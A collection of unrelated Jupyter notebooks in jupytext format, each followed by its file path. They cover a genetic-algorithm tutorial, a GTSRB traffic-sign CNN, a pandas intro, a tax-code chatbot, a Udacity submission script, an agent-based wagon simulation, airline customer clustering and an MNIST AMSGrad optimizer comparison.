compareWithReference("cmt-confOf-reference.ttl", "cmt-confOf-your-system.ttl") # -
lab8/lab8_notebook.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/julianovale/optimization_metaheuristics_python/blob/master/0005_continuous_problem_Genetic_Algorithm.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="fUUSePo8fmQX" # Função objetivo: # # Min Z = (x^2 + y - 11)^2 + (x + y^2 - 7)^2 # # -6 <= x, y <= 6 # # Solução ótima = 0.0 # + id="zlEojYK3m9Ss" import numpy as np from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import random # + colab={"base_uri": "https://localhost:8080/", "height": 248} id="QgZFWqocfabb" outputId="85ee6fb9-f341-4ad3-9765-abb3da3c52a2" def fun(x, y): return (x**2 + y - 11)**2 + (x + y**2 - 7)**2 fig = plt.figure() ax = fig.add_subplot(111, projection='3d') x = y = np.arange(-6.0, 6.0, 0.01) X, Y = np.meshgrid(x, y) zs = np.array(fun(np.ravel(X), np.ravel(Y))) Z = zs.reshape(X.shape) ax.plot_surface(X, Y, Z, cmap = 'rainbow') ax.set_xlabel('X Label') ax.set_ylabel('Y Label') ax.set_zlabel('Z Label') plt.show() # + colab={"base_uri": "https://localhost:8080/"} id="XGAH_yKcoKT5" outputId="a0bba354-4217-4740-8c4a-5495a6bc806a" y_array = np.array([1,1,0,1]) # y x_array = np.array([0,1,1,0]) # x chromosome_test = np.concatenate((y_array, x_array)) chromosome_test # + id="RcM8NqbE0UMj" # os índices poderiam ser (0, 1, 2, 3, # 4, 5, 6, 7) # ou # os índices poderiam ser ([-8], [-7], [-6], [-5], # [-4], [-3], [-2], [-1]) # # bit = gene, chamamos de bit porque são 0 ou 1 (binary digit) # # exemplos para x: (bit*(2^z)): # (0*(2^0))+(1*(2^1))+(1*(2^2))+(0*(2^3)) # ([4]*(2^0))+([5]*(2^1))+([6]*(2^2))+([7]*(2^3)) # ([-1]*(2^0))+([-2]*(2^1))+([-3]*(2^2))+([-4]*(2^3)) # # função objetivo: f(x, y) = (x**2 
+ y - 11)**2 + (x + y**2 - 7)**2 # exemplo de decodificação para x: (sum(bit_x*(2^z))* precision_x + lb_x) ##### up = upper bound; lb = lower bound. # exemplo de precisão para x: (up_x - lb_x) / ((2^len_x)-1) # + colab={"base_uri": "https://localhost:8080/"} id="lqZdDlhTw2NT" outputId="0d42096a-3502-45a2-f1aa-466f538dd254" print("### para a variável x ###") z = 0 # porque se começa em 2^0 na fórmula t = 1 # porque nós vamos começar no último elemento [índice -1] decrescendo em 1 x_bit_sum = 0 for i in range(len(chromosome_test)//2): print() print('o índice é: ',-t) print('o bit é: ',chromosome_test[-t]) print('o z para {} é: {}'.format(chromosome_test[-t],z)) x_bit = chromosome_test[-t]*(2**z) print("{}*(2^{}) = {}".format(chromosome_test[-t],z,x_bit)) x_bit_sum += x_bit t += 1 z += 1 print() print("sum(bit*(2^z)) is: ",x_bit_sum) # + colab={"base_uri": "https://localhost:8080/"} id="Ml9JYrA11RpH" outputId="da05b3aa-385c-46c2-f4f0-a99bcef94c97" print("### para a variável y ###") z = 0 # porque se começa em 2^0 na fórmula t = 1 + len(chromosome_test)//2 # porque nós vamos começar na metade para y, [índice -5] decrescendo em 1 y_bit_sum = 0 for i in range(len(chromosome_test)//2): print() print('o índice é: ',-t) print('o bit é: ',chromosome_test[-t]) print('o z para {} é: {}'.format(chromosome_test[-t],z)) y_bit = chromosome_test[-t]*(2**z) print("{}*(2^{}) = {}".format(chromosome_test[-t],z,y_bit)) y_bit_sum += y_bit t += 1 z += 1 print() print("sum(bit*(2^z)) is: ",y_bit_sum)
0005_continuous_problem_Genetic_Algorithm.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- import imageio from io import BytesIO import numpy as np from matplotlib import pyplot as plt with open('data/test.mkv', 'rb') as file: content = file.read() vid = imageio.get_reader(BytesIO(content), 'ffmpeg') images = [] for num, image in enumerate(vid.iter_data()): if num % 1000: images.append(image) print(len(images)) plt.imshow(images[1150])
src/main/tests/data_acquisition/.ipynb_checkpoints/data_acquisition-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import os import glob import numpy as np import matplotlib.pyplot as plt from skimage import color, exposure, transform, io from sklearn.cross_validation import train_test_split from keras import utils as np_utils from keras.models import Sequential from keras.layers.core import Dense, Dropout, Activation, Flatten from keras.layers.convolutional import Conv2D from keras.layers.pooling import MaxPooling2D from keras.optimizers import SGD from keras import backend as K from keras.callbacks import LearningRateScheduler, ModelCheckpoint K.set_image_data_format('channels_first') # Define the number of outputs to train and image size NUM_CLASSES = 43 # 43 for GTSRB and 164 for European dataset IMG_SIZE = 48 # + import keras import tensorflow as tf import sys print('Keras version', keras.__version__) print('Tensorflow version', tf.__version__) print('Python version', sys.version) # - # ## Function definitions for reading the data # + def preprocess_img(img): # Histogram normalization in v channel hsv = color.rgb2hsv(img) hsv[:, :, 2] = exposure.equalize_hist(hsv[:, :, 2]) img = color.hsv2rgb(hsv) # rescale to standard size img = transform.resize(img, (IMG_SIZE, IMG_SIZE)) # roll color axis to axis 0 img = np.rollaxis(img, -1) return img def get_class(img_path): return int(img_path.split('/')[-2]) # - # ## Read the data # + # Read the training data # Define the path to your traning dataset (GTSRB - Training) root_dir = '../../Datasets/Traffic_signs/German_Recognition/Final_Training/Images' imgs = [] labels = [] # Read all image paths with extension ppm all_img_paths = sorted(glob.glob(os.path.join(root_dir, '*/*.ppm'))) np.random.seed(42) np.random.shuffle(all_img_paths) # Read images and pre-process them for img_path in all_img_paths: img = 
preprocess_img(io.imread(img_path)) label = get_class(img_path) imgs.append(img) labels.append(label) X = np.array(imgs, dtype='float32') # Binarize the labels Y = np.eye(NUM_CLASSES, dtype='uint8')[labels] # + # Read the testing data # Define the path to your testing dataset (GTSRB - Test) root_dir = '../../Datasets/Traffic_signs/German_Recognition/Final_Test/Images' # images are in folders like in training set X_test = [] y_test = [] paths_test=[] # Read all image paths with extension ppm all_img_paths = sorted(glob.glob(os.path.join(root_dir, '*/*.ppm'))) np.random.seed(42) np.random.shuffle(all_img_paths) # Read images and pre-process them for img_path in all_img_paths: img = preprocess_img(io.imread(img_path)) paths_test.append(img_path) label = get_class(img_path) X_test.append(img) y_test.append(label) X_test = np.array(X_test, dtype='float32') # Binarize the labels y_test = np.eye(NUM_CLASSES, dtype='uint8')[y_test] # - # Split training data into train and validation sets # random_state helps defining the same split always with a seed of 42. 
Otherwise the split will always be different X_train, X_val, Y_train, Y_val = train_test_split(X, Y, test_size=0.1, random_state=42) # + # Normalize the data normalize = 0 # Subtract the mean image if normalize: mean_image = np.mean(X_train, axis=0) X_train -= mean_image X_val -= mean_image X_test -= mean_image # - print ('Training data shape: ', X.shape) print ('Training labels shape:', Y.shape) print ('Validation data shape: ', X_val.shape) print ('Validation labels shape: ', Y_val.shape) print ('Testing data sahep: ', X_test.shape) print ('Testing labels shape: ', y_test.shape) # ## Model definition def cnn_model(): model = Sequential() model.add(Conv2D(32, (3, 3), padding='same', input_shape=(3, IMG_SIZE, IMG_SIZE), activation='relu')) model.add(Conv2D(32, (3, 3), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.2)) model.add(Conv2D(64, (3, 3), padding='same', activation='relu')) model.add(Conv2D(64, (3, 3), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.2)) model.add(Conv2D(128, (3, 3), padding='same', activation='relu')) model.add(Conv2D(128, (3, 3), activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Dropout(0.2)) model.add(Flatten()) model.add(Dense(512, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(NUM_CLASSES, activation='softmax')) return model # ## Initialize the model and training parameters # + model = cnn_model() batch_size = 128 epochs = 40 lr = 0.01 sgd = SGD(lr=lr, decay=1e-6, momentum=0.9, nesterov=True) def lr_schedule(epoch): return lr * (0.1 ** int(epoch / 10)) model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy']) # weights initialization def my_init(shape, name=None): value = np.random.random(shape) return K.variable(value, name=name) # - # ## Start the training # Save the training history history = model.fit(X_train, Y_train, batch_size=batch_size, epochs=epochs, validation_data=(X_val,Y_val), 
callbacks=[LearningRateScheduler(lr_schedule), ModelCheckpoint('german_cnn.h5', save_best_only=True)] ) # + # Plot the learning curves acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(len(acc)) plt.plot(epochs, acc, '-o', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend(loc=4) plt.figure() plt.plot(epochs, loss, '-o', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show() # - # ## Model evlauation # evaluate loaded model on test data score = model.evaluate(X_test, y_test, batch_size=128, verbose=1) print("[INFO] %s: %.2f%%" % (model.metrics_names[1], score[1]*100)) # + # load weights into new model (best weights) model2 = cnn_model() model2.load_weights('GTSRB_weights/cnn_german.h5') print("Loaded weights from disk") # evaluate loaded model on test data model2.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy']) score = model2.evaluate(X_test, y_test, batch_size=128, verbose=1) print("[INFO] %s: %.2f%%" % (model2.metrics_names[1], score[1]*100)) # - # # Data augmentation # + from keras.preprocessing.image import ImageDataGenerator from sklearn.cross_validation import train_test_split from keras.callbacks import LearningRateScheduler, ModelCheckpoint datagen = ImageDataGenerator(featurewise_center=False, featurewise_std_normalization=False, width_shift_range=0.1, height_shift_range=0.1, zoom_range=0.2, shear_range=0.1, rotation_range=10.) 
datagen.fit(X_train) # Reinitialize model and compile #model = cnn_model() #model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy']) # Train again epochs = 40 history2=model.fit_generator(datagen.flow(X_train, Y_train, batch_size=batch_size), steps_per_epoch=X_train.shape[0]/batch_size, epochs=epochs, validation_data=(X_val, Y_val), callbacks=[LearningRateScheduler(lr_schedule), ModelCheckpoint('cnn_german_aug.h5', save_best_only=True)] ) # + # Plot the learning curves acc = history2.history['acc'] val_acc = history2.history['val_acc'] loss = history2.history['loss'] val_loss = history2.history['val_loss'] epochs = range(len(acc)) plt.plot(epochs, acc, '-o', label='Training acc') plt.plot(epochs, val_acc, 'b', label='Validation acc') plt.title('Training and validation accuracy') plt.legend(loc=4) plt.figure() plt.plot(epochs, loss, '-o', label='Training loss') plt.plot(epochs, val_loss, 'b', label='Validation loss') plt.title('Training and validation loss') plt.legend() plt.show() # - # evaluate loaded model on test data score = model.evaluate(X_test, y_test, batch_size=128, verbose=1) print("%s: %.2f%%" % (model.metrics_names[1], score[1]*100)) # + # load weights into new model (best weights) model2 = cnn_model() model2.load_weights('GTSRB_weights/cnn_german_aug.h5') #model2.load_weights('model_aug3_98.94.h5') print("Loaded model from disk") # evaluate loaded model on test data lr = 0.01 sgd = SGD(lr=lr, decay=1e-6, momentum=0.9, nesterov=True) model2.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy']) score = model2.evaluate(X_test, y_test, batch_size=128, verbose=1) print("%s: %.2f%%" % (model2.metrics_names[1], score[1]*100)) # - # Print model information model.summary()
models/cnn_8-layers/cnn_model.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:pydata-issst] # language: python # name: conda-env-pydata-issst-py # --- # # A very brief introduction to Pandas # This notebook will cover a few quick examples to show what Pandas dataframes are and how we can use them to work with data. Pandas is an indispensable library for working with data. It easily imports/exports data from a wide variety of sources (Excel, csv, SQL, JSON, HTML, etc), provides nice row/column indexing for viewing/selecting/manipulating the data, works well with time series data, and can do just about any sort of data processing faster than a function you could write yourself. # # For more resources check out: # - [The official 10-min intro to Pandas](https://pandas.pydata.org/pandas-docs/stable/10min.html) # - A nice [DataCamp tutorial on Pandas](https://www.datacamp.com/community/tutorials/pandas-tutorial-dataframe-python) # - The absolutely terrific [Modern Pandas](https://tomaugspurger.github.io/modern-1-intro.html) # By convention we import Pandas as `pd` import pandas as pd # ## Make a simple dataframe # We can create a DataFrame with a dictionary of list or array-like objects. Each item in the dictionary becomes a column, and all items must have the same length. data = { 'label': [x for x in 'ABCABC'], 'data': range(6) } data # ## Select portions of the data # Select a single column, which is a Pandas Series, using brackets, `.<name>`, or `.loc[]`. Always use `.loc[]` when assigning a portion of the data from a DataFrame to another object. # ### Slice the DataFrame # ## Perform string operations on a column # ## Perform math operations # ## Find unique values # ## Group data # Groupby splits a single dataframe into a group of dataframes based on the unique values in one or more columns. You can then specify an operation to apply to each group. 
Pandas will apply the operation, recombine the data, and return the result. # # Because `groupby` splits the data with very little code it can also be an efficient way to access filtered portions of a large dataframe. # ## apply and map # ## Why you should use `.loc[]` # # See the [Setting with copy section](https://tomaugspurger.github.io/modern-1-intro.html) for a more detailed explanation.
notebooks/Pandas/1_class - Intro to Pandas.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Chatbot - example # Example from Chatbot Magazine - https://chatbotsmagazine.com/contextual-chat-bots-with-tensorflow-4391749d0077 import nltk from nltk.stem.lancaster import LancasterStemmer stemmer = LancasterStemmer() import pandas as pd import numpy as np import tflearn import tensorflow as tf import random # ## Step 1: Create a json file for intents (intents.json) # - tags are the name of the intent # - patterns are the questions for the intent so there is a sentence patterns for the NN classifier of which intents # - resposnes are the answers to the question in that intent # + # Import intents file import json with open('intents.json') as json_data: intents = json.load(json_data) # - # ## Step 2: Preprocess data - words, intents classes and documents # + # to use nltk work_tokenize # nltk.download('punkt') # + words = [] classes = [] documents = [] ignore_words = ['?'] # loop through each sentence in our intents patterns for intent in intents['intents']: for pattern in intent['patterns']: # tokenize each word in the sentence w = nltk.word_tokenize(pattern) # add to our words list words.extend(w) # add to documents in our corpus documents.append((w, intent['tag'])) # add to our classes list if intent['tag'] not in classes: classes.append(intent['tag']) # stem and lower each word and remove duplicates words = [stemmer.stem(w.lower()) for w in words if w not in ignore_words] words = sorted(list(set(words))) # remove duplicates classes = sorted(list(set(classes))) print (len(documents), "documents") print (len(classes), "classes", classes) print (len(words), "unique stemmed words", words) # - # ## Step 3: Train with BOW # ### 3a) Tranformation for TensorFlow: from documents of words into tensors of numbers # + # create our training data 
training = [] output = [] # create an empty array for our output output_empty = [0] * len(classes) # training set, bag of words for each sentence for doc in documents: # initialize our bag of words bag = [] # list of tokenized words for the pattern pattern_words = doc[0] # stem each word pattern_words = [stemmer.stem(word.lower()) for word in pattern_words] # create our bag of words array for w in words: bag.append(1) if w in pattern_words else bag.append(0) # output is a '0' for each tag and '1' for current tag output_row = list(output_empty) output_row[classes.index(doc[1])] = 1 training.append([bag, output_row]) # shuffle our features and turn into np.array random.shuffle(training) training = np.array(training) # create train and test lists train_x = list(training[:,0]) # first column = BOW rep train_y = list(training[:,1]) # second column = intent class rep # - # ### 3b) Build model # + # reset underlying graph data tf.reset_default_graph() # Build neural network net = tflearn.input_data(shape=[None, len(train_x[0])]) net = tflearn.fully_connected(net, 8) net = tflearn.fully_connected(net, 8) net = tflearn.fully_connected(net, len(train_y[0]), activation='softmax') net = tflearn.regression(net) # Define model and setup tensorboard model = tflearn.DNN(net, tensorboard_dir='tflearn_logs') # Start training (apply gradient descent algorithm) model.fit(train_x, train_y, n_epoch=1000, batch_size=8, show_metric=True) model.save('model.tflearn') # + # save all of our data structures import pickle pickle.dump( {'words':words, 'classes':classes, 'train_x':train_x, 'train_y':train_y}, open( "training_data", "wb" ) ) # - # ## Step 4: Build Chatbot Framework # + # restore all of our data structures import pickle data = pickle.load( open( "training_data", "rb" ) ) words = data['words'] classes = data['classes'] train_x = data['train_x'] train_y = data['train_y'] # import our chat-bot intents file import json with open('intents.json') as json_data: intents = 
json.load(json_data) # - # load our saved model model.load('./model.tflearn') # + # Functions for tokenizing and BOW vector rep of the query def clean_up_sentence(sentence): # tokenize the pattern sentence_words = nltk.word_tokenize(sentence) # stem each word sentence_words = [stemmer.stem(word.lower()) for word in sentence_words] return sentence_words # return bag of words array: 0 or 1 for each word in the bag that exists in the sentence def bow(sentence, words, show_details=False): # tokenize the pattern sentence_words = clean_up_sentence(sentence) # bag of words bag = [0]*len(words) for s in sentence_words: for i,w in enumerate(words): if w == s: bag[i] = 1 if show_details: print ("found in bag: %s" % w) return(np.array(bag)) # - p = bow("what is the tax code for qualified contribution limits?", words) print (p) # + # Functions to classify intent and output responses based on the intent ERROR_THRESHOLD = 0.25 def classify(sentence): # generate probabilities from the model results = model.predict([bow(sentence, words)])[0] # filter out predictions below a threshold results = [[i,r] for i,r in enumerate(results) if r>ERROR_THRESHOLD] # sort by strength of probability results.sort(key=lambda x: x[1], reverse=True) return_list = [] for r in results: return_list.append((classes[r[0]], r[1])) # return tuple of intent and probability return return_list def response(sentence, userID='123', show_details=False): results = classify(sentence) # if we have a classification then find the matching intent tag if results: # loop as long as there are matches to process while results: for i in intents['intents']: # find a tag matching the first result if i['tag'] == results[0][0]: # a random response from the intent #return print(random.choice(i['responses'])) return random.choice(i['responses']) results.pop(0) # - # Example 1: classify('what is the tax code for qualified contribution limits?') # Example 1: response('what is the tax code for qualified contribution limits?') r = 
response('what is the tax code for qualified contribution limits?') # Example 2: classify('How does increased compensation from previous year taxed?') # Example 2: response('hello') # + # Import script to search the right tax code and description from tax corpus from taxcode_tfidf_search_script import * def full_response(sentence, top_n): answer = response(sentence) if answer == "Tax code is": temp = query_wrapper(sentence,cosine_sim_threshold=0.2,top=top_n) if len(temp) == 0: final = "No tax code found" else: temp_values = temp['title'].values final = (answer + " " + temp_values).tolist() elif answer == "Here is what we found in the tax code:": temp = query_wrapper(sentence,cosine_sim_threshold=0.2,top=top_n) if len(temp) == 0: final = "We have not found any section in tax code related to your question" else: temp_values = temp['title'].values + " " + temp['text'].values final = (answer + " " + temp_values).tolist() else: final = answer return final # - # Example: tax codes top 5 full_response("what is the tax code for qualified contribution limits?", 5) # Example: tax descriptions top 3 full_response("For a benefit plan to be considered as a qualified plan, what are the minimum plan participation criteria?",3)
Bin/Chatbot example_v2.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Project Submission # # When you are ready to submit your project, meaning you have checked the [rubric](https://review.udacity.com/#!/rubrics/1427/view) and made sure that you have completed all tasks and answered all questions. Then you are ready to compress your files and submit your solution! # # The following steps assume: # 1. All cells have been *run* in Notebooks 2 and 3 (and that progress has been saved). # 2. All questions in those notebooks have been answered. # 3. Your architecture in `model.py` is your best tested architecture. # # Please make sure all your work is saved before moving on. You do not need to change any code in these cells; this code is to help you submit your project, only. # # --- # # The first thing we'll do, is convert your notebooks into `.html` files; these files will save the output of each cell and any code/text that you have modified and saved in those notebooks. Note that the first notebooks are not included because their contents will not affect your project review. # !jupyter nbconvert "2_Training.ipynb" # !jupyter nbconvert "3_Inference.ipynb" # ### Zip the project files # # Next, we'll zip all these notebook files and your `model.py` file into one compressed archive named `project2.zip`. # # After completing this step you should see this zip file appear in your home directory, where you can download it as seen in the image below, by selecting it from the list and clicking **Download**. This step may take a minute or two to complete. # # <img src='images/download_ex.png' width=50% height=50%/> # !!apt-get -y update && apt-get install -y zip # !zip project2.zip -r . 
-i@file<EMAIL> # ### Submit Your Project # # After creating and downloading your zip file, click on the `Submit` button and follow the instructions for submitting your `project2.zip` file. Congratulations on completing this project and I hope you enjoyed it!
4_Zip Your Project Files and Submit.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # These lines allow to work more easily on our module while using the notebook # %load_ext autoreload # %reload_ext autoreload # %autoreload 2 import numpy as np from importlib import reload import model import agents from time import sleep # + #our very first wagon :) t = 20 spwan_coord=(6,3) mymodel = model.MODEL(7,15) mymodel.verbose = False mymodel.walls[(1,4)] = 1 mymodel.walls[(1,3)] = 1 mymodel.walls[(1,10)] = 1 mymodel.agents = [model.AGENT((6,3),mymodel,"A"),model.AGENT((6,2),mymodel,"B"),model.AGENT((6,11),mymodel,"C")] mymodel.restCells = [model.RESTCELL((1,5),5),model.RESTCELL((1,2),5),model.RESTCELL((1,9),5),model.RESTCELL((1,11),5)] mymodel.plot_Nb() for i in range (0,t): mymodel.newStep() if i<4 : mymodel.agents.append(agents.AGENT(spwan_coord, mymodel,str(i))) mymodel.clear() mymodel.plot_Nb() sleep(1) # + #second wagon wagon :) t = 30 agent_allowed_to_stand_up = "yes" spawn_coord=(5,2) spawn_coord2=(5,8) mymodel = model.MODEL(6,12) mymodel.verbose = False mymodel.walls[(1,5)] = 1 mymodel.walls[(2,5)] = 1 mymodel.walls[(4,5)] = 1 mymodel.agents = [model.AGENT((5,2),mymodel,"1"),model.AGENT((5,8),mymodel,"2")] mymodel.restCells = [model.RESTCELL((1,1),5),model.RESTCELL((2,1),5),model.RESTCELL((1,4),5),model.RESTCELL((2,4),5),model.RESTCELL((1,10),5),model.RESTCELL((2,10),5),model.RESTCELL((4,4),5),model.RESTCELL((4,6),5),model.RESTCELL((1,6),5),model.RESTCELL((2,6),5)] mymodel.plot_Nb() for i in range (0,t): mymodel.newStep() if i<2: mymodel.agents.append(agents.AGENT(spawn_coord, mymodel,str(i+3))) if i<6 : mymodel.agents.append(agents.AGENT(spawn_coord2, mymodel,str(i+5))) mymodel.clear() mymodel.plot_Nb() sleep(1) # -
Kiara_wagons.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:Anaconda3] # language: python # name: conda-env-Anaconda3-py # --- # + # -*- coding:utf-8 -*- import pandas as pd datafile = '../data/air_data.csv' resultfile = '../data/explore.xls' data = pd.read_csv(datafile, encoding='utf-8') data.head() # - explore = data.describe(percentiles=[], include='all').T explore['null'] = len(data) - explore['count'] explore = explore[['null', 'max', 'min']] explore.columns = [u'空值数',u'最大值',u'最小值'] explore.to_excel(resultfile) explore_data=pd.read_excel('../data/explore.xls') explore_data.describe() cleanfile = '../data/data_cleaned.csv' data = data[data['SUM_YR_1'].notnull()*data['SUM_YR_2'].notnull()] data.head() index1 = data.SUM_YR_1 != 0 index2 = data.SUM_YR_2 != 0 index3 = (data.SEG_KM_SUM == 0) & (data.avg_discount == 0) data = data[index1 | index2 | index3] data.to_csv('../data/data_cleaned.csv') non_normal_data = pd.read_excel('../data/zscoredata.xls') non_normal_data .head() normal_data = (non_normal_data - non_normal_data.mean(axis = 0)) / non_normal_data.std(axis=0) normal_data.head() normal_data.columns = ['Z'+i for i in normal_data.columns] normal_data.to_excel('../data/zscored-data.xls', index=False) normal_data.head() from sklearn.cluster import KMeans inputfile = '../data/zscored-data.xls' k =5 data = pd.read_excel(inputfile) kmodel = KMeans(n_clusters= k, n_jobs=4) kmodel.fit(data) kmodel.cluster_centers_ kmodel.labels_ # + # 绘制雷达图 import numpy as np import matplotlib.pyplot as plt # %matplotlib inline labels = data.columns k = 5 plot_data = kmodel.cluster_centers_ color = ['b', 'g', 'r', 'c', 'y'] angles = np.linspace(0, 2*np.pi, k, endpoint=False) plot_data = np.concatenate((plot_data, plot_data[:,[0]]), axis=1) angles = np.concatenate((angles, [angles[0]])) fig = plt.figure() ax = fig.add_subplot(111, polar=True) for i in 
range(len(plot_data)): ax.plot(angles, plot_data[i], 'o-', color = color[i], label = 'costomer'+str(i), linewidth=2) ax.set_rgrids(np.arange(0.01, 3.5, 0.5), np.arange(-1, 2.5, 0.5), fontproperties="SimHei") ax.set_thetagrids(angles * 180/np.pi, labels, fontproperties="SimHei") ax.set_title("客户群特征分析图", va='bottom', fontproperties="SimHei") plt.legend(loc = 0) plt.show() # -
customerValueAnalysis/code/customer_analysis.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import torch torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False # + import numpy as np import pickle from collections import namedtuple from tqdm import tqdm import torch torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torchvision import torchvision.transforms as transforms from adabound import AdaBound import matplotlib.pyplot as plt # + transform = transforms.Compose( [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]) trainset = torchvision.datasets.MNIST(root='./data_mnist', train=True, download=True, transform=transform) trainloader = torch.utils.data.DataLoader(trainset, batch_size=200, shuffle=True, num_workers=4) testset = torchvision.datasets.MNIST(root='./data_mnist', train=False, download=True, transform=transform) testloader = torch.utils.data.DataLoader(testset, batch_size=200, shuffle=False, num_workers=4) # + device = 'cuda:0' optim_configs = { '1e-4': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 1e-4, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, '5e-3': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 5e-3, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, '1e-2': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 1e-2, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, '1e-3': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 1e-3, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, '5e-4': { 'optimizer': optim.Adam, 'kwargs': { 'lr': 5e-4, 'weight_decay': 0, 'betas': (0.9, 0.999), 'eps': 1e-08, 'amsgrad': True } }, } # + class MLP(nn.Module): def 
__init__(self, hidden_size=256): super(MLP, self).__init__() self.fc1 = nn.Linear(28 * 28, hidden_size) self.fc2 = nn.Linear(hidden_size, 10) def forward(self, x): x = x.view(-1, 28 * 28) x = F.relu(self.fc1(x)) x = self.fc2(x) return x criterion = nn.CrossEntropyLoss() # + hidden_sizes = [256, 512, 1024, 2048] for h_size in hidden_sizes: Stat = namedtuple('Stat', ['losses', 'accs']) train_results = {} test_results = {} for optim_name, optim_config in optim_configs.items(): torch.manual_seed(0) np.random.seed(0) train_results[optim_name] = Stat(losses=[], accs=[]) test_results[optim_name] = Stat(losses=[], accs=[]) net = MLP(hidden_size=h_size).to(device) optimizer = optim_config['optimizer'](net.parameters(), **optim_config['kwargs']) print(optimizer) for epoch in tqdm(range(100)): # loop over the dataset multiple times train_stat = { 'loss': .0, 'correct': 0, 'total': 0 } test_stat = { 'loss': .0, 'correct': 0, 'total': 0 } for i, data in enumerate(trainloader, 0): # get the inputs inputs, labels = data inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() outputs = net(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() _, predicted = torch.max(outputs, 1) c = (predicted == labels).sum() # calculate train_stat['loss'] += loss.item() train_stat['correct'] += c.item() train_stat['total'] += labels.size()[0] train_results[optim_name].losses.append(train_stat['loss'] / (i + 1)) train_results[optim_name].accs.append(train_stat['correct'] / train_stat['total']) with torch.no_grad(): for i, data in enumerate(testloader, 0): inputs, labels = data inputs = inputs.to(device) labels = labels.to(device) outputs = net(inputs) loss = criterion(outputs, labels) _, predicted = torch.max(outputs, 1) c = (predicted == labels).sum() test_stat['loss'] += loss.item() test_stat['correct'] += c.item() test_stat['total'] += labels.size()[0] test_results[optim_name].losses.append(test_stat['loss'] / (i + 1)) 
test_results[optim_name].accs.append(test_stat['correct'] / test_stat['total']) # Save stat! stat = { 'train': train_results, 'test': test_results } with open(f'amsgrad_stat_mlp_{h_size}.pkl', 'wb') as f: pickle.dump(stat, f) # Plot loss f, (ax1, ax2) = plt.subplots(1, 2, figsize=(13, 5)) for optim_name in optim_configs: if 'Bound' in optim_name: ax1.plot(train_results[optim_name].losses, '--', label=optim_name) else: ax1.plot(train_results[optim_name].losses, label=optim_name) ax1.set_ylabel('Training Loss') ax1.set_xlabel('# of Epcoh') ax1.legend() for optim_name in optim_configs: if 'Bound' in optim_name: ax2.plot(test_results[optim_name].losses, '--', label=optim_name) else: ax2.plot(test_results[optim_name].losses, label=optim_name) ax2.set_ylabel('Test Loss') ax2.set_xlabel('# of Epcoh') ax2.legend() plt.suptitle(f'Training Loss and Test Loss for MLP({h_size}) on MNIST', y=1.01) plt.tight_layout() plt.show() # Plot accuracy f, (ax1, ax2) = plt.subplots(1, 2, figsize=(13, 5)) for optim_name in optim_configs: if 'Bound' in optim_name: ax1.plot(train_results[optim_name].accs, '--', label=optim_name) else: ax1.plot(train_results[optim_name].accs, label=optim_name) ax1.set_ylabel('Training Accuracy %') ax1.set_xlabel('# of Epcoh') ax1.legend() for optim_name in optim_configs: if 'Bound' in optim_name: ax2.plot(test_results[optim_name].accs, '--', label=optim_name) else: ax2.plot(test_results[optim_name].accs, label=optim_name) 